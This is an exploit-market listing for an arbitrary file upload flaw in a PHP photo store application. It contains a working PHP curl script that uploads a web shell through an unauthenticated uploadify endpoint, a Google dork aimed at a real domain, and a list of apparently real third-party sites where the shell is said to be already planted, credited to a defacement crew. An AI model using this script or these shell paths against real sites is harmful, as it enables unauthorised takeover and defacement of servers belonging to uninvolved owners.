[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

PhotoStore Arbitrary Shell upload Vulnerability

Author
indexphp
Risk
[
Security Risk Low
]
0day-ID
0day-ID-21724
Category
web applications
Date add
03-01-2014
Platform
php
#######################################################
# Exploit Title:PhotoStore Arbitrary Shell upload
# Google Dork: "site:photocity.co.za"
# Exploit Author: Index Php
# Tested on: Windows, PHP 5.2
#######################################################
#exploit

<?php

$uploadfile="ip.php";
$ch = curl_init("http://target.com/assets/uploadify/old/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);

print "$postResult";
?>

shell path:
[+] Shell : photocity.co.za/ip.php?ina=hajar
[+] Shell : www.rogueeventdigitals.co.uk/ip.php?ina=hajar
[+] Shell : www.saladeprensa.co/ip.php?ina=hajar
[+] Shell : www.stockthatphoto.co.uk/ip.php?ina=hajar
[+] Shell : photokaya.com/ip.php?ina=hajar

greets Gantengers Crew - all Indonesian Defacer

#  0day.today [2024-11-15]  #